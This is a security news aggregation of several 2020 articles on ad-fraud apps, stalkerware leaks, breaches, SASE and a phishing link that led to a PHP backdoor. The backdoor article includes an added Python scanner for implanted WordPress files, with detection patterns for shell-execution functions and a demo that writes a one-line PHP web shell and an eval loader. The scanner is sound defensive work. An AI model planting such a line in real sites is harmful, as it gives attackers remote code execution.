STE WILLIAMS

Google purges 600 Android apps for “disruptive” pop-up ads

You know those ads that obscure your whole screen when you’re trying to make a phone call, unlock your device or use your phone’s GPS?

Technically, they’re called disruptive or out-of-app ads, and they maddeningly pop up outside of the app that hosts them, sometimes causing users to mistakenly click them, thereby frustrating users and wasting advertisers’ money.

On Thursday, Google kicked nearly 600 of the offending apps off its Play store and banned them from its ad monetization platforms, Google AdMob and Google Ad Manager, for violating its disruptive ads policy and disallowed interstitial policy.

Disruptive ads are those that come at you in unexpected ways, including by getting in the way of a device’s functions. While they do occur in-app, Google has recently seen a rise in what it calls “out-of-context ads” – those created by malicious developers who program them to pop up when the user isn’t actually active in their app.

Per Bjorke, Google’s senior product manager for ad traffic quality, said in a Google security blog post that the developers behind these apps keep coming up with ways to deploy them and mask what they’re up to. But Google has been working on technology to detect them, and it’s led to Thursday’s purge:

We recently developed an innovative machine-learning based approach to detect when apps show out-of-context ads, which led to the enforcement we’re announcing today.

Also on Thursday, Google detailed a three-step plan to keep the Play Store and Android ad ecosystem from getting polluted by disruptive ads and other challenges.

One of those steps is doubling down on protecting advertisers from invalid traffic like that coming from disruptive, out-of-app ads. Sweeping the Play store of such apps on Thursday is one example, Google said, given that its investigations are ongoing and it plans to keep taking action against this kind of abuse.

Bjorke told BuzzFeed News that the apps removed on Thursday had been installed more than 4.5 billion times and that they primarily targeted English-speaking users. He also said that the apps mainly came from developers based in China, Hong Kong, Singapore, and India.

Bjorke declined to name specific apps or developers but said that many were utilities or games, although BuzzFeed News reporter Craig Silverman, who’s been reporting about Play Store fraud for a number of years, says that one of the app developers banned on Thursday is Cheetah Mobile, which had about 45 apps removed.

Google says that it’s going to crack down harder on ad policy abusers in the future. It will also publish better tools for app makers to keep compliant with ad industry standards and not annoy Android users.

Finally, Google says it’s going to fundamentally change the Android platform in order to minimize interruptions in app experiences. However, it didn’t elaborate on how it plans to give the user more control over what’s shown on their screen.



Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/xlWz9s2MFTA/

KidsGuard stalkerware leaks data on secretly surveilled victims

“KidsGuard?”

What an inappropriate name. It should be called KidsStalk-N-Dox, given that the makers of this consumer-grade stalkerware left a server open and unprotected, regurgitating the private data it slurped up from thousands of victims’ devices after a parent or other surveillance-happy person stealthily installed it.

The spyware app’s unprotected Alibaba cloud storage bucket was found by Till Kottmann. He’s a developer who reverse-engineers apps to see how they tick (or leak, in this case). Kottmann shared a copy of the Android version of KidsGuard with TechCrunch, which first reported on the data breach on Thursday.

Kottmann’s findings amount to “Goodness, Grandma, what enormous bites you take out of victims’ privacy with those big, keyloggy teeth of yours.”

KidsGuard comes from a company called ClevGuard that promises that its “excellent products” will deliver “all the information” from a targeted device, including real-time location, text messages, browser history, photos, videos, recordings of phone calls, keylogger data for every keystroke entered and the app where it came from, and all the data from all the social apps – hopping over the end-to-end encryption of, for example, WhatsApp.

KidsGuard Pro keylogger capture of WhatsApp message. IMAGE: ClevGuard demo

According to TechCrunch’s Zack Whittaker, the Alibaba storage bucket was apparently set to public: a common mistake with cloud storage buckets. Another mistake: it was left wide open, without a password.

After TechCrunch contacted ClevGuard, it shut down the exposed cloud storage bucket. The news outlet also contacted Alibaba, which similarly alerted the company about the leak.

Here we go again

KidsGuard is like many other commercial-grade spyware in that the stalker needs to have physical access to a device in order to install it. It just takes a few minutes. Whittaker reports that after installation, there’s no rooting or jailbreaking required.

ClevGuard says the app can also be used for iPhones without access to the device (as long as the user doesn’t have 2FA on, in which case you would need to access the phone) if you give it the target’s iCloud credentials.

The Android version that TechCrunch and Kottmann checked out also requires that some security features be disabled, such as allowing non-Google approved apps to be installed and disabling Google Play Protect, Google’s built-in malware protection for Android.

After that, it runs in stealth mode, convincingly posing as an Android “system update” app. It’s tough for a victim to know that their device has been booby-trapped, given that there’s no app icon for them to spot.

That leaves KidsGuard to freely siphon photos, videos, recordings of phone calls, and to monitor activity on a slew of apps, including on dating apps such as Tinder. It also secretly takes screenshots of a victim’s conversations in apps such as Snapchat and Signal, which have supposedly ephemeral messages that disappear. As we’ve noted in the past with regards to Snapchat, those messages don’t disappear, KidsGuard being one of many ways for them to be captured.

Cooper Quintin, senior staff technologist at the Electronic Frontier Foundation (EFF), told TechCrunch that it’s “both alarming and sickening” that the exposed data includes not only that of adults, but also of children.

This is evidence that not only are spouseware and stalkerware companies morally bankrupt, they are also often failing to protect their stolen user data once they have it.

KidsGuard isn’t the first spyware maker that has fumbled victims’ data. It happened with MobiiSpy in March 2019. It happened twice with mSpy, which leaked millions of records in September 2018 and, before that, had its database leaked online in 2015.

For its part, Retina-X Studios, the company behind PhoneSheriff, TeenShield, SniperSpy and Mobile Spy, was repeatedly hacked, first in April 2017 and again in February 2018.

Retina-X finally threw in the towel on the surveillance business a month after that… and then had to settle charges brought by the Federal Trade Commission (FTC) for failing to keep its products from being used as illegal stalking apps.

What to do

Whittaker put together a “detect-and-destroy” guide for identifying and removing KidsGuard from your Android phone, but first, you need to check whether the app has been installed: Go to Settings > Apps, and see if “System Update Service” is listed. This is the name that ClevGuard has given the stalkerware to hide it from the user.

If you think your Android device has been infected with KidsGuard stalkerware, check out the rest of his guide for instructions on removing it.

For iPhone users, Paul Ducklin has the following advice:

If someone has full remote access to your iCloud then you’re in big trouble. They can find out loads about you, and can change it all, too, including resetting your own password and locking you out of your account. So don’t delay, use 2FA today.

If you suspect someone else has access to your iCloud but hasn’t locked you out, go in yourself, change your password and review everything in there, such as what services you are signed up to (are you paying for fleeceware you aren’t even aware of?) and what apps are on your list. Remove anything that you don’t recognise or that shouldn’t be there!



Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/F2UPHduG6YE/

Samsung cops to data breach after unsolicited ‘1/1’ Find my Mobile push notification

Samsung has admitted that what it calls a “small number” of users could indeed read other people’s personal data following last week’s unexplained Find my Mobile notification.

Several Register readers wrote in to tell us that, after last Thursday’s mystery push notification, they found strangers’ personal data displayed to them.

Many readers, assuming Samsung had been hacked, logged into its website to change their passwords. Now the company has admitted that a data breach did occur.

A spokeswoman told The Register: “A technical error resulted in a small number of users being able to access the details of another user. As soon as we became aware of the incident, we removed the ability to log in to the store on our website until the issue was fixed.”

She added: “We will be contacting those affected by the issue with further details.”

From the not-insignificant number of emails El Reg received about the website snafu, it remains to be seen whether Samsung’s definition of “small number” is the same as that of the rest of the world.

Of potentially greater concern is the mystery 1/1 push notification from Find my Mobile, a baked-in app on stock Samsung Android distributions. Although the firm brushed off the worldwide notification as something to do with unspecified internal testing, many of those who wrote to El Reg said they had disabled the app. Stock apps cannot be uninstalled unless one effectively wipes the phone and installs a new operating system – unlocking the bootloader and reformatting with a new third-party, customised ROM.

Samsung did not answer our questions as to how a “disabled” app was able to receive and display push notifications. Nor did it say what other functions this “disabled” app was capable of executing. ®


Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/02/24/samsung_data_breach_find_my_mobile/

Google rolls out Titan keys to Europe, Japan. Plus: Group Policy bug is a feature, not a flaw, says Microsoft

Roundup: It’s once again time for a security news summary. Let’s get to it.

Student accused of hacking crimes cleared… to attend Swiss hackathon

A college student from Zimbabwe who was hit with eight criminal hacking counts will still get to represent his school at a UN hackathon.

Tatenda Christopher Chinyamakobvu was able to convince a judge to loosen his bail conditions after he was selected to attend the #Hack4SmartSustainableCities event in Switzerland.

Chinyamakobvu was one of a trio of students from Chinhoyi University of Technology who won a local coding contest by developing an application to help first-responders spot and assess the seriousness of emergency reports.

When he wasn’t winning hackathons, however, authorities believe Chinyamakobvu was up to less-than-legal actions, breaking into a university records system in order to change his and other students’ grades.

North Korea’s “Hidden Cobra” group surfaces again

The notorious North Korean hacking operation known as “Hidden Cobra” is active once again.

US-Cert says the group, best known for targeting financial institutions as a way to get around economic sanctions against the Norks, is using an updated version of its “Hoplight” malware to infect targets.

Cash of the Titans: Google offers keys for sale internationally

Good news for Brits who have been coveting a new Titan security key. Google says it will be selling the USB-C version of the plug-in security key in the UK and seven other countries: Austria, Canada, France, Germany, Italy, Japan, Spain, and Switzerland.

While users in those countries could already get the USB-A and Bluetooth versions of the keys, the USB-C model had not been available. Just remember to read the instructions – if you use it on your phone you will need GPS enabled, as one Reg hack found after a frustrating couple of hours.

HackerOne discloses security hole in… HackerOne

Bug disclosure service HackerOne was in the rare position of publicizing one of its own security holes this week after a researcher discovered a flaw that was exposing some user email addresses.

A researcher using the handle msdian7 was given an $8,500 payout for discovering and reporting how an attacker could game the project invite feature on the site to view the hidden email addresses of other users. The flaw was traced back to a missing access control rule in HackerOne’s new GraphQL system.

Tenable says Microsoft won’t fix Group Policy bug

Security firm Tenable has gone public after Microsoft declined to patch a security issue in Windows.

Tenable says the flaw is in the Group Policy administration tool. An attacker who already had access could elevate their privileges using a customized profile file. This would allow the attacker to do things that would normally be limited by Group Policy settings.

“Bypassing User Group Policy is not the end of the world, but it’s also not something that should be allowed and depending on User Group Policy setup, could result in unfortunate security scenarios,” notes Tenable’s David Wells.

Microsoft, however, does not consider the bug serious, as the profiles are working as intended. Rather, admins should limit user access to those files.

That’s a SlickWrap

A company that makes custom wrap decals for consumer electronics is getting roasted for its shoddy website security.

White-hat researcher Lynx tipped off The Register to this scathing analysis he wrote of the SlickWrap site and its security failings. The infosec bod found, among other things, exposed customer info and emails from the company, as well as all of its support communications.

On top of that, the biz was said to have completely ignored the security warnings, and was accused of trying to cover evidence of the data exposure. SlickWrap didn’t get back to us.

Adobe AfterEffects gets patch

Adobe AfterEffects has received a security update to address an arbitrary code execution flaw. While this isn’t a particularly dangerous flaw (unless you constantly open untrusted AfterEffects files), it is worth getting patched if you rely on the video editing tool.

Dutch student cuffed for malware

Dutch publication NOS has the story of a 21-year-old student from Utrecht who was arrested and charged with creating trojan tools for other malware writers.

From the sound of it, the student was offering tools that let malware be placed within Word or Excel file macros. He faces at least a year behind bars.

Tech investigator denied US visa

The head of an investigation company that develops technology for media outlets and investigators says he is being barred from the US.

Forensic Architecture boss Eyal Weizman said his visa to enter the US has been revoked because he was apparently linked to a threat to national security. The New York Times reported: “He said that the embassy official had told him that the threat that surfaced could be related to something he was involved in, people he had been in contact with, places he had visited, hotels at which he had stayed, or a pattern of relations among those.”

Man charged for political DDoS attacks

A California bloke was charged with launching a series of distributed-denial-of-service attacks against a candidate running in the Democratic primary against would-be Representative Katie Hill (D-CA).

The FBI believes that Arthur Dam, who was listed as a consultant for Hill, deliberately timed the DDoS attacks to take down the rival’s website at critical times during the race. Hill would narrowly win the primary and go on to win the seat. She has since resigned, for an unrelated sex scandal. ®


Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/02/24/security_roundup_feb_weekthree/

All About SASE: What It Is, Why It’s Here, How to Use It

Secure Access Service Edge is a new name for a known and growing architecture designed to strengthen security in cloud environments.

Secure access service edge, also known as SASE (pronounced “sassy”), is a term popping up more in security conversations as businesses grapple with the challenge of secure networking in the cloud.

SASE combines WAN capabilities with network security functions: secure web gateway, cloud access security broker, firewall-as-a-service, and zero-trust network access. These capabilities are primarily delivered as-a-service and aim to find sensitive data or malware, decrypt content, and monitor risk and the trust level of sessions, Gartner’s Andrew Lerner says in a blog post. Monitored entities can span groups of people, devices, applications, services, or Internet of Things systems.

Gartner first mentioned the term SASE in its 2019 networking hype cycle, but it’s not a novel practice. Rather, it’s a new name for a tactic that organizations have been adopting as they navigate new security hurdles amid the transition to cloud- and mobile-intensive environments.

“It’s a combination of different technologies, all of which I think people have been using in one respect or another, but are converging, and adoption of them is accelerating,” says Tom Cross, chief technology officer at OPAQ, describing SASE. “The reason is, enterprise network architectures have not kept up with the way that IT has changed.”

Modern employees use all kinds of devices to access corporate data and applications from a range of geographical locations. The rise of cloud computing and mobility have disrupted the typical technology infrastructure by swapping the physical data center for infrastructure-as-a-service (IaaS). Many IT teams interact with their network through a web console or API. Your data is everywhere, and you don’t have visibility into everything happening on the network.

Legacy enterprise networks have gone through “major upheaval” over the last couple of years, and organizations have been able to reduce cost and increase agility. SD-WAN was designed to address these needs but doesn’t connect to mobile users, explains Dave Greenfield, technology evangelist at Cato Networks. Furthermore, it’s not enough to address their many cloud security concerns.

Many constructs that make up SASE — firewalls, intrusion-prevention systems (IPS), cloud access security brokers (CASB) — are things businesses have used for years. “These can still be applicable as you move into the cloud,” says Mike Rothman, Securosis’ president and analyst. “But there’s this old adage that just because you can doesn’t mean you should.” Organizations don’t often think about how they can build a cloud-native environment that provides capabilities and flexibility they need while adding security into the network stack.

The traditional model of network security is based on inspection points: Traffic is rerouted through a place where it’s inspected to detect attacks. When you overlay existing capabilities with familiar tools, it’s the “lowest common denominator,” he continues. It drives inefficiency, adds cost, and forces traffic into a bottleneck. Organizations don’t need conventional tools scattered throughout their environments if they can segment more effectively in the cloud, which lets them add more accounts and subscriptions instead of a flat data center network.

“It doesn’t make sense to have an on-premises firewall everyone is rerouting their traffic to,” says Cross. “We need a security infrastructure that makes sense in this world and is convenient for people to use, and that they will use. … What we need is for security to be available in the Internet. Security comes to the traffic, not traffic going to security.”

The SASE Approach to Network Security
Instead of thinking about mobile access, cloud access, and site access as separate things, SASE puts it all into a single global network. With this approach, businesses no longer have separate security policies. There is one policy — one firewall for protecting against network-based threats.

“The secure access service edge converges security and networking together for any kind of endpoint,” Rothman explains. Instead of putting an agent on the device, connecting to a VPN, and rerouting to a cloud-based resource, SASE brings security to each individual device. “If I can bring the secure perimeter to the actual user, this allows me to be more efficient,” he adds.

Cloud networking is different. You don’t think about what you already have but about the kind of network a specific application or use case requires. Build what is needed, where it’s needed, Rothman explains in a report on networking in the cloud age. A network for remote employees should be different from one for interconnecting primary sites. Externally facing web applications need a different network than applications used to access sensitive data kept in a data center.

How it works: The SASE architecture is a cloud-native platform, which provides a company with the heavy security processing it requires, Greenfield explains. Each location runs an SD-WAN device to bring traffic into the SASE cloud. Traffic is sent to a local point-of-presence (POP), where networking and security processing is applied before it’s forwarded to its destination. For Cato Networks, POPs are co-located in the same physical data centers as the cloud providers.

“When you’re first starting out, you have to figure out how to get started and sometimes it can be challenging to [do] a whole reconsideration of security infrastructure,” says Cross.

The key is starting small, Rothman explains. Know the problem you’re trying to solve, select a short list of companies that can help you solve it, present the use case, and see how they can help. Over time, you can add more applications, users, and use cases to the SASE environment.

“It doesn’t have to be a big bang. … You can look at it from an application access or user constituency basis,” he continues. “Pick a use case and start somewhere. Don’t expect you’re going to replace your entire network tomorrow with one of these services.” As part of a gradual process, companies may start implementing SASE in a single office and expand from there.


Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial …

Article source: https://www.darkreading.com/cloud/all-about-sase-what-it-is-why-its-here-how-to-use-it/d/d-id/1337120?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Duped into running bogus virus scans at Office Depot? Dry your eyes with a small check from $35m settlement

Victims of dodgy IT support from Office Depot will start receiving compensation checks, a US consumer watchdog said Thursday.

The payouts come from a 2019 settlement the retail giant reached with the FTC, after the biz was accused of letting employees and a computer support provider trick punters into paying for unneeded malware cleanup and security software. Office Depot agreed to fork out $25m while not admitting liability.

The regulator said that, between 2009 and 2016, the retailer and its partner company, support.com, used a rigged scanning tool that returned false positives for malware infections. It is estimated the pair charged more than half a million people for PC repairs and security software they did not really need.

Now, customers can at least take some consolation in a night out, or at least a nice bottle of wine, from their share of the Office Depot payout, plus $10m from Support.com, to settle the FTC’s deceptive practices lawsuit.


“The FTC is sending out 541,247 checks averaging $63.35 per check,” the watchdog beamed. “Recipients should deposit or cash checks within 60 days, as indicated on the check.”

For some of the ripped-off customers, however, the payout will only be a fraction of what they originally paid for their unneeded repairs. In its court filing [PDF], the FTC said Office Depot (and Office Max, a subsidiary chain) customers were in some cases charged as much as $300 for bogus malware repairs and unneeded security software.

If you’re in line for a check, it’ll be in the mail, we’re told. The FTC warned people to be on alert for scammers posing as middlemen offering to help folks apply for a refund: ignore these scumbags. ®


Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/02/21/ftc_office_depot_fefunds/

Emotet Malware Rears Its Ugly Head Again

A resurgence in Emotet malware may make it one of the most pervasive security threats of 2020.

When it comes to IT security, there is a natural tendency to focus on next-generation threats. But while awareness of newly discovered threats and vulnerabilities is essential, it is also important not to lose sight of long-established threats. Such is the case with Emotet malware.

As malware goes, Emotet has a surprisingly long history. Emotet malware first gained traction in 2014 as a Trojan that was designed to steal online banking information. Over time, Emotet evolved both in the way that it is delivered and in how it behaves.


Article source: https://www.darkreading.com/attacks-breaches/emotet-malware-rears-its-ugly-head-again/d/d-id/1337119?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

S2 Ep27: Bluetooth holes, dodgy Chrome extensions and forgotten passwords – Naked Security Podcast

This week we discuss why Google abruptly pulled more than 500 Chrome extensions from its Web Store, the case of a man held in custody for refusing to decrypt two hard drives, and research detailing a number of security holes in Bluetooth chipsets.

Greg Iddon plays host and producer this week and is joined by fellow Sophos experts Paul Ducklin and Peter Mackenzie.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/RNXX7HxPuPc/

The Amazon Prime phishing attack that wasn’t…

Earlier this week, we received a moderately believable Amazon Prime phish via email.

The scam had an Account Locked subject line, with a warning that we wouldn’t be able to buy or sell anything via Amazon’s services until we verified our account.

To add a bit more fear and urgency, the crooks went on to warn us that if we didn’t complete the verification process within 24 hours, then our account would be deactivated, not merely suspended.

The “good” news, of course, is that verifying our account was as easy as clicking a link in the email:

Your Prime Membership Account Has Been Suspended Due To The Following Problems Below:

Invalid Card Number
Your Billing Address Does Not Match Our Records
Unverified Email Address

You will not be able to Buy and Sell on amazon until you have click the link below to confirm your account details before 24hrs of receiving this message.

We will be forced to deactivate your account automatically if you do not verify your identity.

We don’t think that Naked Security readers would fall for this one, for several reasons:

  • There are numerous grammatical and spelling mistakes in the message. We think fluent speakers of English would notice these and be suspicious.
  • There’s an unreasonable sense of urgency and drama. Amazon almost certainly wouldn’t use words such as “we will be forced to deactivate your account”, and the company wouldn’t need to deactivate your account for failing to respond within a day. (Online services want to keep you as a customer, not to throw you out!)
  • The sender doesn’t know who you are. The greeting “Dear Suspended user” looks, and is, peculiar and suspicious.
  • There’s no need to click the link in the email. If the email is a scam, the link will be false. But if the email is true, you can simply go to the Amazon site yourself, or use the Amazon app – the online location of Amazon isn’t a secret. Therefore the correct action is never to click, whether you believe the link or not.
  • The link the crooks want you to click uses HTTP. Although an HTTPS link would not mean that the page is safe, you should treat all HTTP links as unsafe – even if you trust the website at the other end – because unencrypted web connections can easily be snooped on by other people.

The teachable moment

Nevertheless, we thought we’d follow the phishing link ourselves, just to see how convincing the final result would be – most phishing sites have some sort of “teachable moment” that we can learn from, no matter how smart we think we are already.

Our first steps were simply to check where the link went, rather than downloading the actual content it linked to.

We found that the first hop was to an otherwise-invisible URL on a legitimate business WordPress site that had obviously been hacked and “borrowed” by the crooks to hide their trail.

The main page of the site was still working normally, promoting a PR business with a (rather ironic) tagline in Spanish saying, “It’s the first impression that counts”:

From here the crooks quietly redirected us to a second hacked site, this time a Middle Eastern company selling awnings, canopies and sun-shades:

Once again, the crooks didn’t take us to the front door, but instead pointed us at a usually-invisible URL that even the site operator probably wouldn’t notice unless they carefully went looking for files that shouldn’t be there.

And that’s where we got a surprise!

We don’t know whether the crook who sent us the phishing email made a mistake, and used the wrong URL, or whether a second crook had arrived in the interim and then taken over the hacked server from the original hackers…

…but instead of reaching a page that demanded our Amazon password, which is what we expected, we ended up at the crooks’ very own remote access backdoor:

Pirate skull? Check.

Comic Sans font? Check.

Haxor bragging (including the word haxor)? Check.

Emoticons and needless EXCLAMATION POINTS? Check.

Full remote access with no username or password needed? Check.

In this case, by implanting just one PHP file – a scrambled and obfuscated remote access toolkit – at a known URL they could visit later, the crooks gave themselves an unaudited, unsecured, unlimited remote console to the raw files on the WordPress server.

In other words, the crooks have set things up so they can sidestep the WordPress administration console entirely: they don’t need a password; they won’t get logged by the WordPress system; and they can add and modify files that WordPress wouldn’t normally allow, essentially allowing them to hide content such as phishing pages and malware downloads in plain sight.

Worse still, because their access isn’t mediated by the WordPress administration tools, they can also snoop around on the site where even a WordPress administrator might not be able to go, and upload or edit files that WordPress itself would probably prevent.

What to do?

In the end, this turned into a website insecurity story rather than a phishing alert, and it’s a good reminder of several important facts:

  • No website is unimportant to the crooks. Cybercrime isn’t just about million-dollar ransomware attacks on giant corporations. Your website has real value to the criminals, even if it’s just as a jumping-off point for them to enable further crimes.
  • If your site gets hacked, you’ll probably end up blocklisted. Once the crooks start using your website to host malicious content, you are likely to end up getting blocked or filtered by security products and the major browsers. This could dissuade or even prevent customers from reaching you. So even if the crooks don’t infect your business, they are very likely to affect it.
  • Patches and updates are vital. We don’t know how the crooks got access in this case, but a common entry vector to WordPress sites is via plugins that have security holes that you or your hosting provider forgot to patch. WordPress can keep itself up-to-date, but you also need to keep all the other parts of your system, especially your WordPress plugins, up-to-date as well.

You could also consider investing in a network firewall with web filtering capabilities – web protection isn’t just for users inside your network browsing to the outside.

Security products such as the Sophos XG firewall can also guard you from rogue probes and connections from the outside, adding an extra layer of defence against crooks trying to break in.

Lastly, if you are running your own website, whether it’s on a server that belongs to you or via a cloud service at a hosting company, make sure you pick proper passwords, and turn on 2FA for added login protection if you can.

Remember that crooks who get your password and login just once could leave behind a backdoor, like the one shown here, that gives them unfettered, unaudited and almost undetectable access from then on, even if you change your password.
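The backdoor described above is just a PHP file sitting where it should not be, so the practical counterpart to the advice in this section is to go looking for such files. The scanner below is an added example, not code from the Naked Security article and not a Sophos tool: it reports PHP files in directories that should hold no executable code at all (uploads, cache), files containing the eval / decoder / request-parameter-as-function constructs typical of obfuscated web shells, and files that are missing from or differ from a manifest of known-good hashes taken from a clean deployment. The indicator patterns are this example's own choices, and the sample site it builds in a temporary directory is constructed and harmless.

```python
"""Hunt for implanted PHP files in a WordPress document root.

Added example, not code from the article and not a Sophos tool. Heuristic patterns
are this example's own; the sample site is constructed and contains no real payload.
"""
from __future__ import annotations

import hashlib
import re
import sys
import tempfile
from pathlib import Path

# User-content directories: WordPress never needs *.php here.
NO_PHP_DIRS = ("wp-content/uploads/", "wp-content/cache/")

# Constructs common in obfuscated PHP web shells (heuristic; expect some false positives).
SUSPICIOUS = [
    (re.compile(r"\beval\s*\("), "eval()"),
    (re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("), "decoder call"),
    (re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\("), "command execution"),
    (re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[[^\]]*\]\s*\("), "request parameter called as function"),
    (re.compile(r"\bassert\s*\(\s*\$_"), "assert() on request data"),
    (re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/e['\"]"), "preg_replace /e"),
]
MAX_SANE_LINE = 2000   # packed payloads tend to be one enormous line


def sha256_file(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def scan_file(path: Path) -> list[str]:
    """Content heuristics for one file; returns the matching indicator labels."""
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return ["unreadable"]
    reasons = [label for rx, label in SUSPICIOUS if rx.search(text)]
    if any(len(line) > MAX_SANE_LINE for line in text.splitlines()):
        reasons.append("very long line")
    return reasons


def scan_tree(root: str | Path, manifest: dict[str, str] | None = None) -> dict[str, list[str]]:
    """Walk root and return {relative_path: [reasons]} for every suspicious *.php.
    manifest maps relative path -> sha256 of the files you expect (from a clean
    deployment); anything absent is "not in manifest", anything changed "hash differs"."""
    root = Path(root)
    findings: dict[str, list[str]] = {}
    for path in sorted(root.rglob("*.php")):
        rel = path.relative_to(root).as_posix()
        reasons = scan_file(path)
        if rel.startswith(NO_PHP_DIRS):
            reasons.append("php in upload/cache dir")
        if manifest is not None:
            expected = manifest.get(rel)
            if expected is None:
                reasons.append("not in manifest")
            elif expected != sha256_file(path):
                reasons.append("hash differs from manifest")
        if reasons:
            findings[rel] = reasons
    return findings


def build_sample_site(base: str | Path) -> tuple[Path, dict[str, str]]:
    """Construct a tiny fake WordPress tree: two clean files (recorded in the
    manifest), then one planted loader under uploads/ and one tampered core file."""
    root = Path(base) / "site"
    clean = {
        "index.php": "<?php define('WP_USE_THEMES', true); require __DIR__ . '/wp-blog-header.php';\n",
        "wp-content/plugins/hello/hello.php": "<?php function hello() { return 'hello'; }\n",
    }
    for rel, body in clean.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body)
    manifest = {rel: hashlib.sha256(body.encode()).hexdigest() for rel, body in clean.items()}
    # Planted file: packed eval loader hidden in a date-named uploads directory (dummy payload).
    loader = root / "wp-content/uploads/2020/02/cache-x.php"
    loader.parent.mkdir(parents=True, exist_ok=True)
    loader.write_text("<?php eval(gzinflate(base64_decode('" + "QUJD" * 800 + "')));\n")
    # Tampered core file: a one-liner appended that calls whatever the request names.
    (root / "index.php").write_text(
        clean["index.php"] + "<?php if(isset($_REQUEST['c'])){$_REQUEST['c']($_REQUEST['a']);}\n"
    )
    return root, manifest


def demo() -> dict[str, list[str]]:
    """Build the constructed sample site in a temp dir, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root, manifest = build_sample_site(tmp)
        return scan_tree(root, manifest)


if __name__ == "__main__":
    # With a path argument, scan that document root (no manifest); otherwise run the demo.
    report = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for rel, why in report.items():
        print(f"{rel}: {', '.join(why)}")
```

The manifest check is the one that catches a backdoor which has been appended to an otherwise legitimate core or plugin file, which the content heuristics alone can miss when the added code is small. Run it against a hash list produced from a fresh download of the same WordPress and plugin versions, and treat every "not in manifest" hit under wp-content/uploads as hostile until proven otherwise.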

By the way, if you ever do find yourself wandering in through a crook’s backdoor, like we did here, resist the urge, no matter how tempting, to take a look around “for the sake of research” – you could attract the sort of attention you don’t want.



Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/9mSp9ocEk8g/

How to Get CISOs & Boards on the Same Page

These two groups have talked past each other for years, each hobbled by their own tunnel vision and misperceptions.

Remember the old parable of the blind men touching the elephant? Its lesson is that perspective determines our conclusions, and that we risk missing the big picture if we forget that. Which, in turn, brings us to chief information security officers (CISOs) and boards of directors. For years, these two groups have talked past each other, each hobbled by their own tunnel vision.

Here's how that commonly manifests. The CISO looks at the board and thinks, "That's the money guy… and she's the lawyer." What they have in common, in the CISO's eyes, is little to no understanding of cybersecurity.

Conversely, boards often view CISOs as just another IT staffer, the woman who tries to stop hackers. And a trait CISOs often share is that they can't explain the return on the board's investment, or talk about risk in a way that's meaningful to CXOs and directors.

In the end, neither side understands the other and they fail to unite around their common mission: mitigating enterprise risk. According to two recent studies, however, each side seems to be gaining some vision. Optiv Security’s “The State of the CISO” report and NACD’s “Public Company Governance Survey” provide interesting insight into the state of the relationship between CISOs and boards of directors. These survey-based studies show how CISOs and boards view each other and cybersecurity.

A Convergence of Goals
CISOs historically have had trouble communicating with boards due to the difficulty of connecting cybersecurity programs to business value. On the other side of the table, directors are left wondering how cybersecurity maps to enterprise risk and business enablement, so they view CISOs as technical personnel rather than true C-level business executives.

However, Optiv’s report, which surveyed 100 CISOs from the US and another 100 from the UK, shows that this gap in perception is narrowing considerably. Some 96% of respondents indicated that senior management and directors comprehend cybersecurity more fully now than five years ago, and 86% said they are getting more funding for their programs because of this improved understanding.

Similarly, NACD’s survey of directors found that 79.3% of board members believe their board’s understanding of cyber-risk has significantly improved compared with two years ago. Only 8.7% indicated they did not have enough cyber knowledge to provide effective oversight of cyber risks.

Lingering Disconnects
The communications gap between CISOs and board members appears to be narrowing, but there is still a disconnect when it comes to business priorities. According to the Optiv survey, 76% of CISOs feel that cybersecurity has become so important in their organizations that “CEO tracks” for CISOs will start to emerge. A full 70% of US respondents and 64% of UK respondents said that executive leadership at their company ranks cybersecurity as their top enterprise concern, even if it slows down business.

NACD’s survey does not quite support this sunny CISO perception. Only 28% of responding directors said they prioritize security above all else, even if it slows down business, and 61% said that cybersecurity should not be prioritized above overall business velocity. This perception gap likely would have been wider just a few years ago (prior to directors and CISOs hiking up their respective learning curves), so things seem to be headed in the right direction for CISOs. Nevertheless, the surveys show that CISOs may be a bit optimistic in their view of how boards prioritize cybersecurity today.

Breach Experience: A Scarlet Letter?
One of the most interesting findings across the two surveys is how CISOs and boards view CISO data breach experience. Experiencing a breach was once a “scarlet letter” for CISOs — sometimes costing them their jobs and definitely not something to feature on a resume. Both the Optiv and NACD surveys show this is no longer the case. Boards have a general understanding today that breaches are often unavoidable and that it is the response to the breach, rather than the breach itself, that is the true measure of a CISO’s competence.

In the Optiv survey, 58% of CISOs said that having breach experience makes them more attractive to potential employers than having no breach experience. Surprisingly, CISOs seem to underestimate how boards now value breach experience: a whopping 92% of directors surveyed in the NACD report said that experiencing a breach makes a CISO candidate more attractive, because they have expertise in helping companies respond and recover.

Board/CISO disconnects are still a challenge for both sides. But at least now they seem to know they are both touching an elephant, and that’s good news for any company that wants to reduce enterprise risk exposure.


Joe Schorr has more than 25 years of professional services and industry experience in information and cybersecurity and currently leads the executive services directors at Optiv. Joe is also a director on the Leading Disruptive Innovation Advisory Board at Stetson University … View Full Bio

Article source: https://www.darkreading.com/careers-and-people/how-to-get-cisos-and-boards-on-the-same-page/a/d-id/1337032?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple